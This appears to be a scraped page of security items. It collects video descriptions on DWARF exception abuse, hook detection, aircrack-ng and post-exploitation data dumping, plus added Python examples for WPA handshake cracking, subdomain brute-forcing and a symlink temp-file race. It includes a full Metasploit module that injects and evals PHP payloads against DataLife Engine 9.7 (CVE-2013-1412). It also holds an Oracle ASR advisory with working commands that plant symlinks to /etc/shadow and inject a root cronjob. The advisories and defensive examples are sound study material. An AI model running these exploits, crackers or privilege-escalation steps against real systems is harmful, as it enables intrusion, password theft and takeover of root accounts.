  17. Description: This presentation describes a new technique for abusing the DWARF exception handling architecture used by the GCC tool chain. This technique can be used to exploit vulnerabilities in programs compiled with or linked to exception-enabled parts. Exception handling information is stored in bytecode format, executed by a virtual machine during the course of exception unwinding and handling. We show how a malicious attacker could gain control of those structures and inject bytecode for malicious purposes. This virtual machine is actually Turing-complete, which means that it can be made to run arbitrary attacker logic. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Overwriting The Exception Handling Cache Pointer: DWARF Oriented Programming
  18. LOIC and the cardboard hackers decided to flood RST. Something like Anonymous Caracal.
  19. Description: Hooking is the act of redirecting program control flow somewhere other than it would go by default. For instance, code can be "inline hooked" by rewriting instructions to unconditionally transfer to other code. Or code can be hooked by manipulating control flow data like function pointers (IAT, IDT, SSDT, return addresses on the stack, callback addresses in dynamically allocated objects, etc.). Hooking as a technique is neutral, but it is often used by malicious software to monitor or hide information on a system. Memory integrity verification requires the ability to detect unexpected hooks which could be causing software to lie or be blinded to the true state of the system. But we don't want to make the same mistake that most security software makes, assuming that they can rely on some built-in access control to keep malice at arm's length. The history of exploits is the history of bypassing access control. We want to have a technique which can detect if we ourselves are being manipulated to lie even when the attacker is assumed to be at the same high privilege level as our software. We believe that such a goal can be achieved with the help of an academic technique known as software-based, or timing-based, remote attestation. This is a technique which does not require a hardware root of trust like a TPM in order to bootstrap an ephemeral dynamic root of trust for measurement. It does this by computing a randomized checksum over its own memory and other system state, to detect code or control flow integrity attacks. The self-checking software can still be forced to lie and report an unmodified system, but thanks to a special looping construction, code which causes it to lie will require extra instructions per loop. The extra instructions will be multiplied by the number of loops, causing a macroscopic, remotely-detectable increase in the runtime vs. what's expected. So basically, an attacker can force our software to lie, but because there's a timing side-channel built into the computation, he can still be caught by taking too long to generate a convincing lie. We have independently implemented and confirmed the claims of past work, and furthermore showed that the timing discrepancy in the presence of a checksum-forging attacker is detectable not just for machines on the same ethernet segment, but over 10 links of our production LAN. Because of the results of other work in timing side-channel detection over internet-scale distances, we think this technique can be extended even further. But for now, for longer distances, we use this same timing-based technique in concert with a TPM as a trustworthy timer, so that network jitter is not an issue. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: No More Hooks: Detection Of Code Integrity Attacks
  20. Description: Welcome back to the Aircrack-ng Megaprimer, Part 4! In this video, I will discuss the tool for which the suite is named, aircrack-ng. I will cover the following topics: WPA cracking, WEP cracking. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: http://www.securitytube.net/video/6813
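What aircrack-ng actually does when it "cracks WPA" from a captured 4-way handshake, as an added Python example that is not from the video or from aircrack-ng itself: derive the PMK from each candidate passphrase with PBKDF2-HMAC-SHA1, expand it to the PTK with the 802.11i PRF over both MAC addresses and both nonces, and check whether the KCK reproduces the MIC on the captured EAPOL-Key frame. The handshake below is constructed in this file from a known passphrase so the attack can be demonstrated offline; the SSID, MACs, nonces and wordlist are made up.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a 4-way handshake."""
import hashlib
import hmac
import struct

EAPOL_MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC
EAPOL_MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes). This is the
    expensive step and why cracking speed is measured in keys per second."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol_zeroed_mic: bytes, key_descriptor_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed, keyed with the KCK
    (first 16 bytes of the PTK). Version 1 (TKIP) is HMAC-MD5, version 2 (CCMP) is
    HMAC-SHA1 truncated to 16 bytes."""
    if key_descriptor_version == 1:
        return hmac.new(kck, eapol_zeroed_mic, hashlib.md5).digest()
    return hmac.new(kck, eapol_zeroed_mic, hashlib.sha1).digest()[:16]


def build_eapol_key_m2(snonce: bytes, key_info: int = 0x010A) -> bytes:
    """Constructed message 2 of the handshake (supplicant's reply carrying SNonce and
    the first MIC), MIC field zeroed. key_info 0x010A = version 2, pairwise, MIC set."""
    body = (struct.pack(">BHH", 2, key_info, 16)            # descriptor type RSN, key info, key length
            + (1).to_bytes(8, "big")                         # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)       # nonce, IV, RSC, ID
            + bytes(EAPOL_MIC_LEN) + struct.pack(">H", 0))   # MIC (zeroed), key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body       # EAPOL version 2, type Key


def crack(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, eapol: bytes, wordlist):
    """Try each candidate passphrase until one reproduces the captured MIC."""
    captured_mic = eapol[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + EAPOL_MIC_LEN]
    zeroed = eapol[:EAPOL_MIC_OFFSET] + bytes(EAPOL_MIC_LEN) + eapol[EAPOL_MIC_OFFSET + EAPOL_MIC_LEN:]
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7       # low 3 bits of key info
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), captured_mic):
            return candidate
    return None


# Constructed handshake; a real one comes from the capture file airodump-ng writes.
SSID = "ConstructedLab"
AA = bytes.fromhex("0011223344aa")     # AP BSSID
SPA = bytes.fromhex("0011223344bb")    # station MAC
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
TRUE_PASSPHRASE = "correct horse battery"


def constructed_capture() -> bytes:
    """Build M2 exactly as a supplicant holding the true passphrase would."""
    frame = bytearray(build_eapol_key_m2(SNONCE))
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + EAPOL_MIC_LEN] = eapol_mic(kck, bytes(frame), 2)
    return bytes(frame)


if __name__ == "__main__":
    words = ["password", "letmein", "correct horse battery", "12345678"]
    print("recovered:", crack(SSID, AA, SPA, ANONCE, SNONCE, constructed_capture(), words))
```

Two things worth noticing from the code: nothing in the attack touches the access point once the handshake is captured, so there is no rate limit and no log entry, and the 4096-round PBKDF2 is the only thing standing between a captured handshake and a weak passphrase.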
  21. Description: In this video I will show you how to dump data from the victim machine after exploitation. 30 to 40% of people save their sensitive information on the computer without any encryption. So let's see: if that PC is compromised, you can dump the data by file type. Very easy to dump files: DLLs, photos, etc. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Post-Exploitation Dump Data From The Victim Machine
  22. Description: In this video I will show you how to use the dnsspider and dnsgoblin tools. Both tools are by Nullsecurity.net. Dnsspider: a very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation. Dnsgoblin: a nasty creature constantly searching for DNS servers. It uses standard DNS queries and waits for the replies. nullsecurity. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Dnsspider - Dnsgoblin Tools Usage
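The wordlist-plus-permutation subdomain search that dnsspider performs, as an added Python example (not dnsspider's own code). The resolver is injectable: resolve_fake answers from a constructed zone so the search runs offline, resolve_live uses the system resolver. It also handles the case the description does not mention but every brute-forcer hits, a wildcard record that makes every candidate "exist". The domain, zone and addresses are made up.

```python
"""Subdomain brute-forcing from a wordlist and/or character permutations."""
import itertools
import secrets
import socket
import string
from concurrent.futures import ThreadPoolExecutor

DEFAULT_ALPHABET = string.ascii_lowercase + string.digits

# Constructed zone standing in for real DNS (example.test is reserved for exactly this).
FAKE_ZONE = {
    "www.example.test": "192.0.2.10",
    "mail.example.test": "192.0.2.25",
    "dev1.example.test": "192.0.2.50",
}


def resolve_fake(name: str):
    return FAKE_ZONE.get(name)


def resolve_live(name: str):
    """System resolver; None on NXDOMAIN or any other lookup failure."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def candidates(domain: str, wordlist=(), perm_len: int = 0, alphabet: str = DEFAULT_ALPHABET):
    """Yield label.domain for every wordlist entry, then for every string of length
    perm_len over alphabet. That second part is len(alphabet)**perm_len names, so
    keep perm_len small (3 over a-z0-9 is already 46,656 queries)."""
    perms = ("".join(t) for t in itertools.product(alphabet, repeat=perm_len)) if perm_len else ()
    seen = set()
    for label in itertools.chain(wordlist, perms):
        label = label.strip().lower()
        if label and label not in seen:          # de-duplicate so nothing is queried twice
            seen.add(label)
            yield f"{label}.{domain}"


def brute_force(domain: str, resolve, wordlist=(), perm_len: int = 0,
                alphabet: str = DEFAULT_ALPHABET, threads: int = 32) -> dict:
    """Resolve every candidate on a thread pool; return {name: ip} for those that
    answered. A wildcard record (*.domain) would answer everything, so a random label
    is probed first and candidates answering with that same address are dropped."""
    wildcard_ip = resolve(f"{secrets.token_hex(6)}.{domain}")
    names = list(candidates(domain, wordlist, perm_len, alphabet))
    found = {}
    with ThreadPoolExecutor(max_workers=threads) as pool:
        for name, ip in zip(names, pool.map(resolve, names)):
            if ip is not None and ip != wildcard_ip:
                found[name] = ip
    return found


if __name__ == "__main__":
    hits = brute_force("example.test", resolve_fake,
                       wordlist=["www", "mail", "ftp", "vpn"], perm_len=4, alphabet="dev1")
    for name, ip in sorted(hits.items()):
        print(name, ip)
```

The wildcard filter is the one piece most quick scripts omit; without it a zone with `*.example.test` reports every single candidate as found. Swapping `resolve_fake` for `resolve_live` runs the same logic against real DNS.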
  23. A few sources gathered from here and there, a little knowledge = this
  24. This Metasploit module exploits a PHP code injection vulnerability in DataLife Engine 9.7. The vulnerability exists in preview.php, due to insecure usage of preg_replace() with the e modifier, which allows injection of arbitrary PHP code when the template in use contains a [catlist] or [not-catlist] tag.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DataLife Engine preview.php PHP Code Injection',
      'Description'    => %q{
        This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
        The vulnerability exists in preview.php, due to an insecure usage of
        preg_replace() with the e modifier, which allows to inject arbitrary php
        code, when the template in use contains a [catlist] or [not-catlist] tag.
      },
      'Author'         =>
        [
          'EgiX',        # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-1412' ],
          [ 'BID', '57603' ],
          [ 'EDB', '24438' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'Keys' => ['php']
        },
      'DisclosureDate' => 'Jan 28 2013',
      'Targets'        =>
        [
          ['DataLife Engine 9.7', { }],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
      ], self.class)
  end

  # Base URI, always ending in a slash so engine/preview.php can be appended.
  def base
    base = normalize_uri(target_uri.path)
    base << '/' if base[-1, 1] != '/'
    return base
  end

  # Inject a printf() of a random marker through catlist[0]; if the marker comes
  # back in the response body, the e-modifier preg_replace() evaluated our PHP.
  def check
    fingerprint = rand_text_alpha(4+rand(4))

    res = send_request_cgi(
      {
        'uri'       => "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' => {
          'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
        }
      })

    if res and res.code == 200 and res.body =~ /#{fingerprint}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Same injection point, but eval() the base64-encoded PHP payload instead.
  def exploit
    @peer = "#{rhost}:#{rport}"

    print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")

    res = send_request_cgi(
      {
        'uri'       => "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' => {
          'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
        }
      })
  end
end

Source: PacketStorm
  25. Oracle Automated Service Manager version 1.3 suffers from a local root privilege escalation vulnerability during install.

Oracle Automated Service Manager 1.3 local root during install
Larry W. Cashdollar
1/29/2013
@_larry0

SUNWsasm-1.3.1-20110815093723
https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534

From the README:

"Oracle Automated Service Manager 1.3.1
Oracle Automated Service Manager is the service management container for Auto Service Request and Secure File Transport. It provides platform services (such as logging, data transport and persistence) to business services that are deployed to it."

Possible issues with files in /tmp.

root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp
##Read the contents of crontab into a tmp file
/usr/bin/crontab -l > /tmp/crontab_edit
echo "0" > /tmp/tmpVariable
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit | echo "1" > /tmp/tmpVariable
grep "0" /tmp/tmpVariable > /dev/null
echo >> /tmp/crontab_edit
echo "##Cronjob entry for ASR Auto Rules Update" >> /tmp/crontab_edit
echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >> /tmp/crontab_edit
ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit`
sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
sed "/ASR Status Report/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit`
sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
sed "/ASR Heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
/usr/bin/crontab /tmp/crontab_edit
## Finally remove the tmp file
rm -f /tmp/tmpVariable
rm -f /tmp/crontab_edit
tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'`
/usr/bin/crontab -l > /tmp/asrtab.??
UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??`
sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??`
sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
/usr/bin/crontab /tmp/asrtab.??
rm /tmp/asrtab.??
]!tmpD
root@dev-unix-sec01:~/test#

First try, file overwriting vulnerability:

$ ln -s /etc/shadow /tmp/mytab-tmp.??
$ ln -s /etc/shadow /tmp/mytab.??

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...                ########################################### [100%]
Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.
License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms of Use)
   1:SUNWsasm               ########################################### [100%]
Authentication service cannot retrieve authentication info
You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.
Authentication service cannot retrieve authentication info
You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.

[root@oracle-lnx-lab02 ~]# cat /etc/shadow
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

Ok, let's try to inject a cronjob and get root:

Malicious user does:
[meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo "* * * * * /tmp/rootme" > /tmp/mytab.??; done

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...                ########################################### [100%]
Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.
License and Terms of Use for this software are described at https://support.oracle.com/ (see Terms of Use)
   1:SUNWsasm               ########################################## [100%]

[root@oracle-lnx-lab02 ~] crontab -l
* * * * * /tmp/rootme
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

/tmp/rootme is:
#!/bin/sh
chmod 666 /etc/shadow

after a minute:
[root@oracle-lnx-lab02 ~] ls -l /etc/shadow
-rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow
[root@oracle-lnx-lab02 ~]

Faulty Code:
319 /usr/bin/crontab -l > /tmp/mytab.??
320 if [ $(/bin/grep -c 'sasm' /tmp/mytab.??) -eq 0 ];then
321 echo "0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1" >> /tmp/mytab.??
322 /usr/bin/crontab /tmp/mytab.??
323 fi
324
325 rm /tmp/mytab.??

SUNWswasr RPM post install /tmp race condition

From the documentation:

"Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered."

The post-install script for the SUNWswasr RPM handles files in /tmp insecurely. I suspect a race condition exists where these two files can be used to either clobber root-owned files or inject malicious cronjobs into root's cron:

/tmp/tmpVariable
/tmp/crontab_edit

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWswasr-4.3.1-20130117131218.rpm
Preparing...                ########################################### [100%]
Copyright [2008,2012], Oracle and/or its affiliates. All rights reserved.
License and Terms of Use for this software are described at https://support.oracle.com/ (see Legal Notices and Terms of Use).
   1:SUNWswasr              ########################################### [100%]
Directory /var/opt/SUNWsasm/configuration/caseinfo created.
Directory /var/opt/SUNWsasm/configuration/supportfile created.
ASR Manager Auto Update functionality has been enabled by default. Please ensure that ASR manager is registered with ASR backend to get the software updates.
Installation of SUNWswasr was successful.

Let's fire up fsnoop[1] and take a look:

[C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 100 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 2 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 101 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 143 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 188 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[D] F /tmp/tmpVariable
[D] F /tmp/crontab_edit

Those look exploitable, let's pick one. I was able to inject my own cronjob in as root with the following simple PoC:

$ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done

[root@oracle-lnx-lab02 ~]# crontab -l
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1
* * * * * /tmp/rootme <--- prepended and contains our malicious shell/binary, see exploit above.

##Cronjob entry for ASR Auto Rules Update
7 3 * * * /opt/SUNWswasr/bin/update_rules.sh

The uninstall script is just as sloppy:

[C] F /tmp/asrtab.??
[U] F /tmp/asrtab.??
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[D] F /tmp/asrtab.??

Did they mean to use $$ for the process PID?

References:
[1] fsnoop - /tmp directory file watching utility by vl4dz. http://vladz.devzero.fr/fsnoop.php
http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm#BABHIHFF?
http://vapid.dhs.org/advisories/Oracle_ASR_4.3.1-root-install.html

Source: PacketStorm
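The bug class behind both scripts, predictable temp-file name plus a pre-planted symlink, as an added Python example that is not code from the advisory. It stages the race the advisory describes (`crontab -l > /tmp/mytab.??` redirected through a symlink onto a root-owned file) inside a private temporary directory with a fake "shadow" target, so it needs no root and touches neither the real /tmp nor a real crontab, and puts the vulnerable open() beside two hardened forms: O_EXCL|O_NOFOLLOW when a fixed name is unavoidable, and mkstemp() when it is not. The target content and the planted name are constructed for the example.

```python
"""Symlink attack on a predictable /tmp name: vulnerable write vs. hardened writes."""
import errno
import os
import tempfile

HARDENED_ERRNOS = (errno.EEXIST, errno.ELOOP)   # what a refused open() reports


def vulnerable_write(path: str, data: bytes) -> None:
    """What the shell redirection does: open the fixed name for writing and follow
    whatever is already there, including a symlink planted by an unprivileged user."""
    with open(path, "wb") as f:
        f.write(data)


def hardened_write(path: str, data: bytes) -> None:
    """If a fixed name must be used: O_EXCL fails when any entry (a symlink included,
    even a dangling one) already exists, O_NOFOLLOW refuses a symlink as the final
    component. The caller gets an error instead of a clobbered file."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def mkstemp_roundtrip(data: bytes) -> bool:
    """What the install script should have done: mkstemp() picks an unpredictable name
    and creates it atomically with O_EXCL, so there is no name to pre-plant."""
    with tempfile.TemporaryDirectory() as tmp:
        fd, path = tempfile.mkstemp(prefix="mytab.", dir=tmp)
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        with open(path, "rb") as f:
            back = f.read()
        os.unlink(path)
        return back == data and not path.endswith("mytab.??")


def simulate(writer) -> dict:
    """Race outcome: the attacker plants <tmp>/mytab.?? -> <tmp>/shadow before the
    privileged writer runs. Returns the target's final content and the errno the
    writer raised, if any."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "shadow")        # stands in for /etc/shadow
        with open(target, "wb") as f:
            f.write(b"root:$6$constructed$hash:15000:0:99999:7:::\n")
        planted = os.path.join(tmp, "mytab.??")     # the script's predictable name
        os.symlink(target, planted)
        err = None
        try:
            writer(planted, b"* * * * * /tmp/rootme\n")
        except OSError as e:
            err = e.errno
        with open(target, "rb") as f:
            return {"target": f.read(), "errno": err}


if __name__ == "__main__":
    print("vulnerable:", simulate(vulnerable_write))
    print("hardened:  ", simulate(hardened_write))
    print("mkstemp round-trip ok:", mkstemp_roundtrip(b"* * * * * /opt/SUNWsasm/bin/sasm\n"))
```

The same symlink that lets the advisory's attacker overwrite /etc/shadow is exactly what O_EXCL rejects, which is why the fix is never "check whether the file exists first" (that reintroduces the race) but an atomic create. For shell scripts the equivalent is `mktemp` instead of a hand-built name; a sticky /tmp with `fs.protected_symlinks=1` on Linux blocks this particular trick as well, but only for symlinks, so the script fix is still required.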